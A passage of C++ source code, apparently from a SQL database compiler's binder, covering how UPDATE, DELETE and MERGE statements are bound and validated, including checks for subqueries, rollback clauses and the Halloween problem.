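  // given [FIRST n]: Update -> FirstN(n) -> Scan, so at most the first n
  // qualifying rows reach the update.)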
if ((getOperatorType() == REL_UNARY_UPDATE) && (child(0)->getOperatorType() == REL_SCAN)) { Scan * scanNode = (Scan *)(child(0)->castToRelExpr()); if ((scanNode->getFirstNRows() != -1) && (getGroupAttr()->isEmbeddedUpdateOrDelete())) { *CmpCommon::diags() << DgSqlCode(-4216); bindWA->setErrStatus(); return NULL; } if (scanNode->getFirstNRows() >= 0) { FirstN * firstn = new(bindWA->wHeap()) FirstN(scanNode, scanNode->getFirstNRows(), NULL); firstn->bindNode(bindWA); if (bindWA->errStatus()) return NULL; setChild(0, firstn); } } // if rowset is used in set clause a direct rowset that is not in subquery // must be present in the where clause if ((bindWA->getHostArraysArea()) && (bindWA->getHostArraysArea()->hasHostArraysInSetClause()) && (!(bindWA->getHostArraysArea()->hasHostArraysInWhereClause()))) { *CmpCommon::diags() << DgSqlCode(-30021) ; bindWA->setErrStatus(); return this; } NABoolean transformUpdateKey = updatesClusteringKeyOrUniqueIndexKey(bindWA); if (bindWA->errStatus()) // error occurred in updatesCKOrUniqueIndexKey() return this; NABoolean xnsfrmHbaseUpdate = FALSE; if ((hbaseOper()) && (NOT isMerge())) { if (CmpCommon::getDefault(HBASE_TRANSFORM_UPDATE_TO_DELETE_INSERT) == DF_ON) { xnsfrmHbaseUpdate = TRUE; } else if ((CmpCommon::getDefault(HBASE_TRANSFORM_UPDATE_TO_DELETE_INSERT) == DF_SYSTEM) && (getTableDesc()->getNATable()->hasSecondaryIndexes())) { xnsfrmHbaseUpdate = TRUE; } else if (avoidHalloween()) { xnsfrmHbaseUpdate = TRUE; } else if (getCheckConstraints().entries()) { xnsfrmHbaseUpdate = TRUE; } } if (xnsfrmHbaseUpdate) { boundExpr = transformHbaseUpdate(bindWA); } else if ((transformUpdateKey) && (NOT isMerge())) { boundExpr = transformUpdatePrimaryKey(bindWA); } else boundExpr = handleInlining(bindWA, boundExpr); if (bindWA->errStatus()) // error occurred in transformUpdatePrimaryKey() return this; // or handleInlining() return boundExpr; } // Update::bindNode() // ----------------------------------------------------------------------- // member functions for class MergeUpdate // ----------------------------------------------------------------------- RelExpr *MergeUpdate::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } bindWA->initNewScope(); if ((isMerge()) && (child(0))) { ItemExpr *selPred = child(0)->castToRelExpr()->selPredTree(); if (selPred || where_) { NABoolean ONhasSubquery = (selPred && selPred->containsSubquery()); NABoolean ONhasAggr = (selPred && selPred->containsAnAggregate()); NABoolean whrHasSubqry = FALSE; if (ONhasSubquery || ONhasAggr || (where_ && ((whrHasSubqry=where_->containsSubquery()) || where_->containsAnAggregate()))) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0 (ONhasSubquery ? "Subquery in ON clause not allowed." : (ONhasAggr ? "aggregate function in ON clause not allowed." : (whrHasSubqry ? "subquery in UPDATE ... WHERE clause not allowed." : "aggregate function in UPDATE ... WHERE clause not allowed."))); bindWA->setErrStatus(); return this; } ItemExpr *ONhasUDF = (selPred ? selPred->containsUDF() : NULL); ItemExpr *whereHasUDF = (where_ ? where_->containsUDF() : NULL); if (ONhasUDF || whereHasUDF) { *CmpCommon::diags() << DgSqlCode(-4471) << DgString0 (((UDFunction *)(ONhasUDF ? 
ONhasUDF : whereHasUDF))-> getFunctionName().getExternalName()); bindWA->setErrStatus(); return this; } } } if ((isMerge()) && (recExprTree())) { if (recExprTree()->containsSubquery()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" Subquery in SET clause not allowed."); bindWA->setErrStatus(); return this; } if (recExprTree()->containsUDF()) { *CmpCommon::diags() << DgSqlCode(-4471) << DgString0(((UDFunction *)recExprTree()->containsUDF())-> getFunctionName().getExternalName()); bindWA->setErrStatus(); return this; } } // if insertValues, then this is an upsert stmt. if (insertValues()) { if (insertValues()->containsSubquery()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" Subquery in INSERT clause not allowed."); bindWA->setErrStatus(); return this; } if (insertValues()->containsUDF()) { *CmpCommon::diags() << DgSqlCode(-4471) << DgString0(((UDFunction *)insertValues()->containsUDF())-> getFunctionName().getExternalName()); bindWA->setErrStatus(); return this; } Tuple * tuple = new (bindWA->wHeap()) Tuple(insertValues()); Insert * ins = new (bindWA->wHeap()) Insert(getTableName(), NULL, REL_UNARY_INSERT, tuple, insertCols(), NULL); ins->setInsertType(Insert::SIMPLE_INSERT); if (isMergeUpdate()) ins->setIsMergeUpdate(TRUE); else ins->setIsMergeDelete(TRUE); ins->setTableDesc(getTableDesc()); bindWA->getCurrentScope()->xtnmStack()->createXTNM(); ins = (Insert*)ins->bindNode(bindWA); if (bindWA->errStatus()) return NULL; bindWA->getCurrentScope()->xtnmStack()->removeXTNM(); mergeInsertRecExpr() = ins->newRecExpr(); mergeInsertRecExprArray() = ins->newRecExprArray(); } NATable *naTable = bindWA->getNATable(getTableName()); if (bindWA->errStatus()) return NULL; if ((naTable->getViewText() != NULL) && (naTable->getViewCheck())) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" View with check option not allowed."); bindWA->setErrStatus(); return NULL; } if ((naTable->isHbaseCellTable()) || (naTable->isHbaseRowTable())) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0("Hbase tables not supported."); bindWA->setErrStatus(); return NULL; } if (naTable->isHiveTable()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0("Hive tables not supported."); bindWA->setErrStatus(); return NULL; } bindWA->setMergeStatement(TRUE); RelExpr * boundExpr = Update::bindNode(bindWA); if (bindWA->errStatus()) return NULL; if (checkForMergeRestrictions(bindWA)) return NULL; if (where_) { bindWA->getCurrentScope()->context()->inWhereClause() = TRUE; where_->convertToValueIdSet(mergeUpdatePred(), bindWA, ITM_AND); bindWA->getCurrentScope()->context()->inWhereClause() = FALSE; if (bindWA->errStatus()) return NULL; // any values added by where_ to Outer References Set should be // added to input values that must be supplied to this MergeUpdate getGroupAttr()->addCharacteristicInputs (bindWA->getCurrentScope()->getOuterRefs()); } bindWA->removeCurrentScope(); bindWA->setMergeStatement(TRUE); return boundExpr; } // MergeUpdate::bindNode() // ----------------------------------------------------------------------- // member functions for class Delete // ----------------------------------------------------------------------- RelExpr *Delete::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Save the current scope and node for children to peruse if necessary. 
BindContext *context = bindWA->getCurrentScope()->context(); if (context) { context->deleteScope() = bindWA->getCurrentScope(); context->deleteNode() = this; if (getFirstNRows() >= 0) context->firstN() = TRUE; } RelExpr * boundExpr = GenericUpdate::bindNode(bindWA); if (bindWA->errStatus()) return boundExpr; if ((csl_) && (NOT getTableDesc()->getNATable()->isHbaseRowTable())) { *CmpCommon::diags() << DgSqlCode(-1425) << DgTableName(getTableDesc()->getNATable()->getTableName(). getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return this; } if (getTableDesc()->getNATable()->isHbaseCellTable()) { *CmpCommon::diags() << DgSqlCode(-1425) << DgTableName(getTableDesc()->getNATable()->getTableName(). getQualifiedNameAsAnsiString()) << DgString0("Reason: Cannot delete from an hbase table in CELL format. Use ROW format for this operation."); bindWA->setErrStatus(); return this; } // QSTUFF if (getGroupAttr()->isStream() && !getGroupAttr()->isEmbeddedUpdateOrDelete()) { *CmpCommon::diags() << DgSqlCode(-4180); bindWA->setErrStatus(); return this; } // QSTUFF // Not only are check constraints on a DELETE nonsensical, // but they can cause VEGReference::replaceVEGReference to assert // with valuesToBeBound.isEmpty (Genesis 10-980202-0718). // // in case we are binding a generic update within a generic update // due to view expansion we would like to ensure that all constraints // are checked properly for the update operation performed on the // underlying base table if (NOT (bindWA->inViewExpansion() && bindWA->inGenericUpdate())) { // QSTUFF getTableDesc()->checkConstraints().clear(); checkConstraints().clear(); } if (getTableDesc()->getClusteringIndex()->getNAFileSet()->isEntrySequenced()) { // 4018 DELETE query cannot be used against an Entry-Seq table. *CmpCommon::diags() << DgSqlCode(-4018) << DgTableName(getTableDesc()->getNATable()->getTableName(). getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return this; } if (NOT getTableDesc()->getVerticalPartitions().isEmpty()) { // 4029 DELETE query cannot be used on a vertically partitioned table. *CmpCommon::diags() << DgSqlCode(-4029) << DgTableName(getTableDesc()->getNATable()->getTableName(). getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return this; } Scan *scanNode = NULL; // make sure scan done as part of a delete runs in serializable mode so a // tsj(scan,delete) implementation of a delete runs as an atomic operation if (child(0)->getOperatorType() == REL_SCAN) { scanNode = (Scan*)(child(0)->castToRelExpr()); if (!scanNode->accessOptions().userSpecified()) { scanNode->accessOptions().updateAccessOptions (TransMode::ILtoAT(TransMode::SERIALIZABLE_)); } } BindScope *prevScope = NULL; BindScope *currScope = bindWA->getCurrentScope(); NABoolean inUnion = FALSE; while (currScope && !inUnion) { BindContext *currContext = currScope->context(); if (currContext->inUnion()) { inUnion = TRUE; } prevScope = currScope; currScope = bindWA->getPreviousScope(prevScope); } RelRoot *root = bindWA->getTopRoot(); if (getFirstNRows() >= 0) // First N Delete { CMPASSERT(getOperatorType() == REL_UNARY_DELETE); // First N Delete on a partitioned table. Not considered a MTS delete. 
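    // If the clustering index is partitioned, a FirstN node is added below the
    // delete (and firstNRows is reset); on a single partition the statement is
    // instead treated as an MTS delete, subject to the rowset, subquery and
    // ORDER BY restrictions checked below.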
if (getTableDesc()->getClusteringIndex()->isPartitioned()) { if (root->getCompExprTree() || inUnion ) // for unions we know there is a select { // outer selectnot allowed for "non-MTS" first N delete *CmpCommon::diags() << DgSqlCode(-4216); bindWA->setErrStatus(); return this; } RelExpr * childNode = child(0)->castToRelExpr(); FirstN * firstn = new(bindWA->wHeap()) FirstN(childNode, getFirstNRows(), NULL); firstn->bindNode(bindWA); if (bindWA->errStatus()) return NULL; setChild(0, firstn); setFirstNRows(-1); } else { // First N delete on a single partition. This is considered a MTS Delete. if ((bindWA->getHostArraysArea()) && ((bindWA->getHostArraysArea()->hasHostArraysInWhereClause()) || (bindWA->getHostArraysArea()->getHasSelectIntoRowsets()))) { // MTS delete not supported with rowsets *CmpCommon::diags() << DgSqlCode(-30037); bindWA->setErrStatus(); return this; } if (scanNode && scanNode->getSelectionPred().containsSubquery()) { // MTS Delete not supported with subquery in where clause *CmpCommon::diags() << DgSqlCode(-4138); bindWA->setErrStatus(); return this; } if (root->hasOrderBy()) { // mts delete not supported with order by *CmpCommon::diags() << DgSqlCode(-4189); bindWA->setErrStatus(); return this; } if (root->getCompExprTree() || // MTS Delete has an outer select bindWA->isInsertSelectStatement() || // Delete inside an Insert Select statement, Soln:10-061103-0274 inUnion ) // for unions we know there is a select { if (root->getFirstNRows() < -1 || inUnion) // for unions we wish to raise a union { // The outer select has a Last 1/0 clause // specific error later, so set the flag now. setMtsStatement(TRUE); } else { // raise an error if no Last 1 clause is found. *CmpCommon::diags() << DgSqlCode(-4136); bindWA->setErrStatus(); return this; } } } } // Triggers -- if ((NOT isFastDelete()) && (NOT noIMneeded())) boundExpr = handleInlining(bindWA, boundExpr); else if (hbaseOper() && (getGroupAttr()->isEmbeddedUpdateOrDelete())) { setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA)); CorrName corrOLDTable (getScanNode(TRUE)->getTableDesc()->getCorrNameObj().getQualifiedNameObj(), bindWA->wHeap(),"OLD"); // expose OLD table columns getRETDesc()->addColumns(bindWA, *child(0)->getRETDesc(), &corrOLDTable); ValueIdList outputs; getRETDesc()->getValueIdList(outputs, USER_AND_SYSTEM_COLUMNS); addPotentialOutputValues(outputs); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); } if (isMtsStatement()) bindWA->setEmbeddedIUDStatement(TRUE); if (getFirstNRows() > 0) { // create a firstN node to delete FIRST N rows, if no such node was created // during handleInlining. Occurs when DELETE FIRST N is used on table with no // dependent objects. 
FirstN * firstn = new(bindWA->wHeap()) FirstN(boundExpr, getFirstNRows()); if (NOT(scanNode && scanNode->getSelectionPred().containsSubquery())) firstn->setCanExecuteInDp2(TRUE); firstn->bindNode(bindWA); if (bindWA->errStatus()) return NULL; setFirstNRows(-1); boundExpr = firstn; } if (csl()) { for (Lng32 i = 0; i < csl()->entries(); i++) { NAString * nas = (NAString*)(*csl())[i]; bindWA->hbaseColUsageInfo()->insert ((QualifiedName*)&getTableDesc()->getNATable()->getTableName(), nas); } } return boundExpr; } // Delete::bindNode() // ----------------------------------------------------------------------- // member functions for class MergeDelete // ----------------------------------------------------------------------- RelExpr *MergeDelete::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } bindWA->initNewScope(); if ((isMerge()) && (child(0)) && (child(0)->castToRelExpr()->selPredTree())) { if (child(0)->castToRelExpr()->selPredTree()->containsSubquery()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" Subquery in ON clause not allowed."); bindWA->setErrStatus(); return this; } if (child(0)->castToRelExpr()->selPredTree()->containsUDF()) { *CmpCommon::diags() << DgSqlCode(-4471) << DgString0(((UDFunction *)child(0)-> castToRelExpr()->selPredTree()-> containsUDF())-> getFunctionName().getExternalName()); bindWA->setErrStatus(); return this; } } // if insertValues, then this is an upsert stmt. if (insertValues()) { if (insertValues()->containsSubquery()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" Subquery in INSERT clause not allowed."); bindWA->setErrStatus(); return this; } if (insertValues()->containsUDF()) { *CmpCommon::diags() << DgSqlCode(-4471) << DgString0(((UDFunction *)insertValues()-> containsUDF())-> getFunctionName().getExternalName()); bindWA->setErrStatus(); return this; } Tuple * tuple = new (bindWA->wHeap()) Tuple(insertValues()); Insert * ins = new (bindWA->wHeap()) Insert(getTableName(), NULL, REL_UNARY_INSERT, tuple, insertCols(), NULL); ins->setInsertType(Insert::SIMPLE_INSERT); ins->setIsMergeDelete(TRUE); ins->setTableDesc(getTableDesc()); bindWA->getCurrentScope()->xtnmStack()->createXTNM(); ins = (Insert*)ins->bindNode(bindWA); if (bindWA->errStatus()) return NULL; bindWA->getCurrentScope()->xtnmStack()->removeXTNM(); mergeInsertRecExpr() = ins->newRecExpr(); mergeInsertRecExprArray() = ins->newRecExprArray(); } NATable *naTable = bindWA->getNATable(getTableName()); if (bindWA->errStatus()) return NULL; if ((naTable->getViewText() != NULL) && (naTable->getViewCheck())) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" View with check option not allowed."); bindWA->setErrStatus(); return NULL; } bindWA->setMergeStatement(TRUE); RelExpr * boundExpr = Delete::bindNode(bindWA); if (bindWA->errStatus()) return NULL; if (checkForMergeRestrictions(bindWA)) return NULL; bindWA->removeCurrentScope(); bindWA->setMergeStatement(TRUE); return boundExpr; } // MergeDelete::bindNode() static const char NEWTable [] = "NEW"; // QSTUFF: corr for embedded d/u static const char OLDTable [] = "OLD"; // QSTUFF: corr for embedded d/u // QSTUFF // this method binds both, the set clauses applied to the after // image as well as the set clauses applied to the before image // the new set on rollback clause allows an application to modify // the before image. 
// delete from tab set on rollback x = 1; // update tab set x = 1 set on rollback x = 2; #pragma nowarn(770) // warning elimination void GenericUpdate::bindUpdateExpr(BindWA *bindWA, ItemExpr *recExpr, ItemExprList &assignList, RelExpr *boundView, Scan *scanNode, SET(short) &stoiColumnSet, NABoolean onRollback) { RETDesc *origScope = NULL; ValueIdSet &newRecExpr = (onRollback == TRUE) ? newRecBeforeExpr() : this->newRecExpr(); ValueIdArray &newRecExprArray = (onRollback == TRUE) ? newRecBeforeExprArray() : this->newRecExprArray(); if (onRollback && ((!getTableDesc()->getClusteringIndex()->getNAFileSet()->isAudited()) || (getTableDesc()->getNATable()->hasLobColumn()))) { // SET ON ROLLBACK clause is not allowed on a non-audited table *CmpCommon::diags() << DgSqlCode(-4214) << DgTableName(getTableDesc()->getNATable()->getTableName(). getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return; } CollIndex i, j; CollIndexList colnoList; // map of col nums (row positions) CollIndex a = assignList.entries(); const ColumnDescList *viewColumns = NULL; // if this is a view then get the columns of the view if (boundView) { viewColumns = boundView->getRETDesc()->getColumnList(); } // if the GU has a SET ON ROLLBACK clause this method is called // twice: once to bind the columns in the SET clause and a second // time to bind the columns in the SET ON ROLLBACK clause. // Initially the update column list of the stoi_ is empty. // If this is the second call, store the update column list // from the first call. short *stoiColumnList = NULL; CollIndex currColumnCount = 0; if (currColumnCount = stoi_->getStoi()->getColumnListCount()) { stoiColumnList = new (bindWA->wHeap()) short[currColumnCount]; for (i = 0; i < currColumnCount; i++) stoiColumnList[i] = stoi_->getStoi()->getUpdateColumn(i); } stoi_->getStoi()->setColumnList(new (bindWA->wHeap()) short[a + currColumnCount]); for (i = 0; i < a; i++) { CMPASSERT(assignList[i]->getOperatorType() == ITM_ASSIGN); assignList[i]->child(0)->bindNode(bindWA); // LHS if (bindWA->errStatus()) return; const NAColumn *nacol = assignList[i]->child(0).getNAColumn(); if(getOperatorType() == REL_UNARY_UPDATE) { stoi_->getStoi()->setUpdateColumn(i, (short) nacol->getPosition()); stoi_->getStoi()->incColumnListCount(); stoi_->addUpdateColumn(nacol->getPosition()); } const NAType *colType = nacol->getType(); if (!colType->isSupportedType()) { *CmpCommon::diags() << DgSqlCode(-4028) // 4028 table not updatatble << DgTableName(nacol->getNATable()->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return; } // If this is a sequence generator IDENTITY column // with a default type of GENERATED ALWAYS, // then post error -3428. GENERATED ALWAYS // IDENTITY columns may not be updated. if(getOperatorType() == REL_UNARY_UPDATE && CmpCommon::getDefault(COMP_BOOL_210) == DF_ON && nacol->isIdentityColumnAlways()) { *CmpCommon::diags() << DgSqlCode(-3428) << DgString0(nacol->getColName()); bindWA->setErrStatus(); return; } colnoList.insert(nacol->getPosition()); // save colno for next loop // in case its not a view we record the column position of the // base table, otherwise that of the view if (NOT boundView) stoiColumnSet.insert((short) nacol->getPosition()); // if this is a view get the positions of the columns // within the view that are being updated. 
if (boundView) { ValueId vid = assignList[i]->child(0).getValueId(); NABoolean found = FALSE; for (CollIndex k=0; k < viewColumns->entries(); k++) { if ((*viewColumns)[k]->getValueId() == vid) { stoiColumnSet.insert((short) k); found = TRUE; // Updatable views cannot have any underlying basetable column // appear more than once, so it's safe to break out of the loop. break; } } // loop k CMPASSERT(found); } // boundView } // loop i<a // If this is the second call to this method, restore the update // columns bound in the first call if (currColumnCount) { for (i = a; i < (currColumnCount + a); i++) { stoi_->getStoi()->setUpdateColumn(i, stoiColumnList[i-a]); stoi_->addUpdateColumn(stoiColumnList[i-a]); } } // RHS: Bind the right side of the Assigns such that the source expressions // reference the columns of the source table. // //### With a cascade of views, should this be "getRETDesc" as is, //### or "scanNode->getRETDesc" ? --? //### Should I set this->setRD to be the target(new)tbl at the beginning, //### explicitly say "scanNode..." here? --i think not // if (GU_DEBUG) GU_DEBUG_Display(bindWA, this, "u"); origScope = bindWA->getCurrentScope()->getRETDesc(); // this sets the scope to the scan table for the before values // the previous scope was to the "UPDATE" table // we will reset the scope before returning in order not to introduce // hidden side effects but have the generic update explicitely point // to the scan scope bindWA->getCurrentScope()->setRETDesc(getRETDesc()); //this has to be done after binding the LHS because of triggers //Soln :10-050110-3403 : Don't side-effect the SET on ROLLBACK list //when we come down to process it the next time over.So process only //the assignList ItemExpr* tempExpr = assignList.convertToItemExpr(); tempExpr->convertToValueIdSet(newRecExpr, bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return; if (NOT onRollback) { for (ValueId v = newRecExpr.init(); newRecExpr.next(v); newRecExpr.advance(v)) { CMPASSERT(v.getItemExpr()->getOperatorType() == ITM_ASSIGN); // remove all the onrollack expressions if (((Assign *)v.getItemExpr())->onRollback()) { newRecExpr.remove(v); } } } else { for (ValueId v = newRecExpr.init(); newRecExpr.next(v); newRecExpr.advance(v)) { CMPASSERT(v.getItemExpr()->getOperatorType() == ITM_ASSIGN); // remove all the NON-onrollack expressions if ((getOperatorType() == REL_UNARY_UPDATE) && !(((Assign *)v.getItemExpr())->onRollback())) { newRecExpr.remove(v); } } if (getOperatorType() == REL_UNARY_DELETE) { recExpr->convertToValueIdSet(this->newRecExpr(), bindWA, ITM_ITEM_LIST); } } // now we built the RHS // Now we have our colnoList map with which to build a temporary array // (with holes) and get the update columns ordered (eliminating dups). // Actually we store the ids of the bound Assign nodes corresponding // to the columns, of course. 
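  // Hypothetical illustration: for "UPDATE T SET C3 = ..., C1 = ..." on a
  // five-column table, holeyArray ends up with entries at column positions 0
  // and 2 and holes everywhere else; the loop after it then copies just the
  // used entries, in column-position order, into newRecExprArray, which has
  // no holes.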
// CollIndex totalColCount = getTableDesc()->getColumnList().entries(); #pragma nowarn(1506) // warning elimination ValueIdArray holeyArray(totalColCount); #pragma warn(1506) // warning elimination ValueId assignId; // i'th newRecExpr valueid for (i = 0, assignId = newRecExpr.init(); // bizarre ValueIdSet iter newRecExpr.next(assignId); i++, newRecExpr.advance(assignId)) { j = colnoList[i]; if (holeyArray.used(j)) { const NAColumn *nacol = holeyArray[j].getItemExpr()->child(0).getNAColumn(); //4022 target column multiply specified *CmpCommon::diags() << DgSqlCode(-4022) << DgColumnName(nacol->getColName()); bindWA->setErrStatus(); return; } holeyArray.insertAt(j, assignId); } // // Now we have the holey array. The next loop ignores unused entries // and copies the used entries into newRecExprArray(), with no holes. // It also builds a list of the columns being updated that contain // a column on the right side of the SET assignment expression. // // Entering this loop, i is the number of specified update columns; // exiting, j is. // CMPASSERT(i == a); // we built a map between identifical old and new columns, i.e. columns // which are not updated and thus identical. We insert the resulting // equivalence relationships e.g. old.a = new.a during transformation // into the respective VEGGIES this allows the optimizer to select index // scan for satisfying order requirements specified by an order by clause // on new columns, e.g. // select * from (update t set y = y + 1 return new.a) t order by a; // we cannot get the benefit of this VEG for a merge statement when IM is required // allowing a VEG in this case causes corruption on base table key values because // we use the "old" value of key column from fetchReturnedExpr, which can be junk // in case there is no row to update/delete, and a brand bew row is being inserted NABoolean mergeWithIndex = isMerge() && getTableDesc()->hasSecondaryIndexes() ; if ((NOT onRollback) && (NOT mergeWithIndex)){ for (i = 0;i < totalColCount; i++){ if (!(holeyArray.used(i))){ oldToNewMap().addMapEntry( scanNode->getTableDesc()-> getColumnList()[i].getItemExpr()->getValueId(), getTableDesc()-> getColumnList()[i].getItemExpr()->getValueId()); } } } // when binding a view which contains an embedded update // we must map update valueids to scan value ids // to allow for checking of access rights. for (i = 0; i < getTableDesc()->getColumnList().entries();i++) bindWA->getUpdateToScanValueIds().addMapEntry( getTableDesc()->getColumnList()[i].getItemExpr()->getValueId(), scanNode->getTableDesc()->getColumnList()[i].getItemExpr()->getValueId()); newRecExprArray.resize(i); TableDesc *scanDesc = scanNode->getTableDesc(); NABoolean rightContainsColumn = FALSE; for (i = j = 0; i < totalColCount; i++) { if (holeyArray.used(i)) { ValueId assignExpr = holeyArray[i]; newRecExprArray.insertAt(j++, assignExpr); ItemExpr *right = assignExpr.getItemExpr()->child(1); // even if a column is set to a constant we mark it // as updated to prevent indices covering this column from // being used for access ItemExpr *left = assignExpr.getItemExpr()->child(0); scanDesc->addColUpdated(left->getValueId()); if (right->containsColumn()) rightContainsColumn = TRUE; } } // WITH NO ROLLBACK not supported if rightside of update // contains a column expression. 
Also this feature is not // supported with the SET ON ROLLBACK feature if (isNoRollback() || (CmpCommon::transMode()->getRollbackMode() == TransMode::NO_ROLLBACK_)) { if ((rightContainsColumn && CmpCommon::getDefault(ALLOW_RISKY_UPDATE_WITH_NO_ROLLBACK) == DF_OFF) || onRollback) { NAString warnMsg = ""; if(rightContainsColumn) { warnMsg = "Suggestion: Set ALLOW_RISKY_UPDATE_WITH_NO_ROLLBACK CQD to ON to allow"; if (getOperatorType() == REL_UNARY_DELETE) warnMsg += " DELETE "; else warnMsg += " UPDATE "; warnMsg += "command with right-hand side SET clause consisting of columns."; } if (getOperatorType() == REL_UNARY_DELETE) *CmpCommon::diags() << DgSqlCode(-3234) << DgString0(warnMsg); else *CmpCommon::diags() << DgSqlCode(-3233) << DgString0(warnMsg); bindWA->setErrStatus(); return ; } } CMPASSERT(j == a); bindWA->getCurrentScope()->setRETDesc(origScope); } #pragma warn(770) // warning elimination void getScanPreds(RelExpr *start, ValueIdSet &preds) { RelExpr *result = start; while (result) { preds += result->selectionPred(); if (result->getOperatorType() == REL_SCAN) break; if (result->getArity() > 1) { return ; } result = result->child(0); } return; } // Note that this is the R2 compatible way to handle Halloween problem. // This update (only insert for now) contains a reference to the // target in the source. This could potentially run into the so // called Halloween problem. Determine if this is a case we may be // able to handle. The cases that we handle are: // // -- The reference to the target is in a subquery // -- There any number of references to the target in the source // -- The subquery cannot be a row subquery. // -- The subquery must contain only one source (the reference to the target) // -- // // Return TRUE if this does represent a Halloween problem and the caller will // then issue the error message // // Return FALSE is this is a case we can handle. Set the // 'avoidHalloweenR2' flag in the subquery and this generic Update so // that the optimizer will pick a plan that is Halloween safe. // NABoolean GenericUpdate::checkForHalloweenR2(Int32 numScansToFind) { // If there are no scans, no problem, return okay (FALSE) // if(numScansToFind == 0) { return FALSE; } // Allow any number of scans // Do not support for general NEO users. if (CmpCommon::getDefault(MODE_SPECIAL_1) == DF_OFF) return TRUE; // Number of scans of the target table found so far. // Int32 numHalloweenScans = 0; // Get the primary source of the generic update. We are looking for // the halloween scans in the predicates of this scan node // ValueIdSet preds; getScanPreds(this, preds); Subquery *subq; // Search the preds of this scan for subqueries. // // ValueIdSet &preds = scanNode->selectionPred(); for(ValueId p = preds.init(); preds.next(p); preds.advance(p)) { ItemExpr *pred = p.getItemExpr(); // If this pred contains a subquery, find the scans // if(pred->containsSubquery()) { ValueIdSet subqPreds; subqPreds += pred->getValueId(); // Search all the preds and their children // while(subqPreds.entries()) { ValueIdSet children; for(ValueId s = subqPreds.init(); subqPreds.next(s); subqPreds.advance(s)) { ItemExpr *term = s.getItemExpr(); // Found a subquery, now look for the scan... // if(term->isASubquery()) { subq = (Subquery *)term; // We don't support row subqueries, keep looking for the scan // in the next subquery. if(!subq->isARowSubquery()) { // Is this the subquery that has the scan of the table // we are updating? 
// Scan *halloweenScan = subq->getSubquery()->getScanNode(FALSE); if(halloweenScan) { // Is this the scan we are looking for? // if(halloweenScan->getTableDesc()->getNATable() == getTableDesc()->getNATable()) { subq->setAvoidHalloweenR2(this); numHalloweenScans++; } } } } // Follow all the children as well. // for(Int32 i = 0; i < term->getArity(); i++) { children += term->child(i)->getValueId(); } } subqPreds = children; } } } setAvoidHalloweenR2(numScansToFind); // If we found and marked all the halloween scans, then return FALSE (allow). // We have marked the subqueries to avoid the halloween problem. This will // force the optimizer to pick a plan that will be safe. // if(numHalloweenScans == numScansToFind) return FALSE; return TRUE; } // See ANSI 7.9 SR 12 + 6.3 SR 8 for definition of "updatable" table // references; in particular, note that one of the requirements for a view's // being updatable is that ultimately underlying it (passing through a // whole stack of views) is *exactly one* wbase table -- i.e., no joins // allowed. // RelExpr *GenericUpdate::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // QSTUFF // we indicate that we are in a generic update. If we are // already in a generic update we know that this time we are // binding a generic update within a view. // however be aware of the following scenario. We currently // reject embedded updates and streams in the source but // obviously allow view with embedded updates as a target. // Since its already within a generic update we will only // return the scan node to the insert // // insert into select ... from (update/delete ....) t; // // but not cause the update to be bound in when doing // // insert into viewWithDeleteOrUpdate values(...); // // in both cases we got an insert->update/delete->scan NABoolean inGenericUpdate = FALSE; if (getOperatorType() != REL_UNARY_INSERT) inGenericUpdate = bindWA->setInGenericUpdate(TRUE); NABoolean returnScanNode = (inGenericUpdate && bindWA->inViewExpansion() && ( getOperatorType() == REL_UNARY_DELETE || getOperatorType() == REL_UNARY_UPDATE )); // those group attributes should be set only by the topmost // generic update once we are invoked when already binding // another generic we reset those group attributes since we // already know that we will only return a scan node if ((returnScanNode) && (child(0))) { child(0)->getGroupAttr()->setStream(FALSE); child(0)->getGroupAttr()->setSkipInitialScan(FALSE); child(0)->getGroupAttr()->setEmbeddedIUD(NO_OPERATOR_TYPE); } // if we have no user-specified access options then // get it from nearest enclosing scope that has one (if any) if (!accessOptions().userSpecified()) { StmtLevelAccessOptions *axOpts = bindWA->findUserSpecifiedAccessOption(); if (axOpts) { accessOptions() = *axOpts; } } // The above code is in Scan::bindNode also. // It would be nice to refactor this common code; someday. // Make sure we have the appropriate transaction mode & isolation level // in order to do the update. Genesis 10-970922-3488. // Keep this logic in sync with Generator::verifyUpdatableTransMode()! Lng32 sqlcodeA = 0, sqlcodeB = 0; // fix case 10-040429-7402 by checking our statement level access options // first before declaring any error 3140/3141. 
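  // The isolation level used for the check below comes from the
  // ISOLATION_LEVEL_FOR_UPDATES setting (as resolved by getIsolationLevel());
  // verifyUpdatableTrans() then reports 3140 (READ UNCOMMITTED isolation) or
  // 3141 (access mode not READ WRITE) through sqlcodeA/sqlcodeB.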
